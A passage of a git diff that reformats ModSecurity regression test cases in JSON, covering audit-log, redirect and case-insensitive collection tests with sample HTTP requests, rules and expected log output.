3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -144,33 +146,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 306, "redirect_url": "http://www.google.com" }, @@ -179,7 +182,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,status:306,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -195,8 +198,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -204,33 +207,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ @@ -238,7 +242,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny,status:500\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, @@ -254,8 +258,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -263,33 +267,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ @@ -313,8 +318,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -322,33 +327,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ diff --git a/test/test-cases/regression/auditlog.json b/test/test-cases/regression/auditlog.json index 417f9950e4..879b1aac64 100644 --- a/test/test-cases/regression/auditlog.json +++ b/test/test-cases/regression/auditlog.json @@ -15,33 +15,35 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -72,33 +74,35 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -130,33 +134,35 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -188,24 +194,28 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" @@ -213,8 +223,6 @@ }, "expected": { "audit_log": "{\"transaction\":{\"client_ip\":\"200.249.12.31\",\"time_stamp\":\"\\S{3} \\S{3} [ \\d]\\d \\d{2}:\\d{2}:\\d{2} \\d{4}\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -247,24 +255,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=test2", + "uri": "/test.pl?param1=test¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "id \"1556", - "error_log": "", "http_code": 403 }, "rules": [ @@ -296,24 +314,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=tEst2", + "uri": "/test.pl?param1=test¶m2=tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -345,24 +373,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=%20tEst2", + "uri": "/test.pl?param1=test¶m2=%20tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -394,24 +432,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=tEst2", + "uri": "/test.pl?param1=test¶m2=tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -444,24 +492,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=%20tEst2", + "uri": "/test.pl?param1=test¶m2=%20tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -494,24 +552,28 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" @@ -519,8 +581,6 @@ }, "expected": { "audit_log": "\\[audit\\.log]:\\ ---.*\\[audit\\.log]:\\ Keep-Alive", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -553,24 +613,28 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/?%ADd+allow%3d1+%ADd+auto", + "uri": "/?%ADd+allow%3d1+%ADd+auto", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" @@ -578,8 +642,6 @@ }, "expected": { "audit_log": "\"match\":\"Matched \\\\\"Operator `ValidateUtf8Encoding' with parameter `' against variable `ARGS_NAMES:\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\(Value: `\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\)\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -612,8 +674,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -622,27 +684,26 @@ "Pragma": "no-cache", "Cache-Control": "no-cache", "Content-Type": "application/x-www-form-urlencoded", - "Content-Length": "3" + "Content-Length": "5" }, - "uri": "\/?attack=true", + "uri": "/?attack=true", "method": "POST", "http_version": 1.1, "body": [ - "\u00ad=\u00ad" + "­=­" ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" ] }, "expected": { - "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad\\\\\\\\x0a", - "debug_log": "", - "error_log": "", + "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad", "http_code": 403 }, "rules": [ @@ -675,8 +736,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -685,19 +746,20 @@ "Pragma": "no-cache", "Cache-Control": "no-cache", "Content-Type": "application/x-www-form-urlencoded", - "Content-Length": "3", - "X-\u00ad-custom": "Some \u00ad value" + "Content-Length": "5", + "X-­-custom": "Some ­ value" }, - "uri": "\/?attack=true", + "uri": "/?attack=true", "method": "POST", "http_version": 1.1, "body": [ - "\u00ad=\u00ad" + "­=­" ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" @@ -705,8 +767,6 @@ }, "expected": { "audit_log": "\"X-\\\\\\\\xc2\\\\\\\\xad-custom\":\"Some \\\\\\\\xc2\\\\\\\\xad value\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ diff --git a/test/test-cases/regression/collection-case-insensitive.json b/test/test-cases/regression/collection-case-insensitive.json index 83c3a4d818..8db58efe94 100644 --- a/test/test-cases/regression/collection-case-insensitive.json +++ b/test/test-cases/regression/collection-case-insensitive.json @@ -1,57 +1,59 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: Case insensitive (1/1)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: Case insensitive (1/1)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_headers \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=matched_var:%{matched_var}%\"", "SecRule TX \"@contains 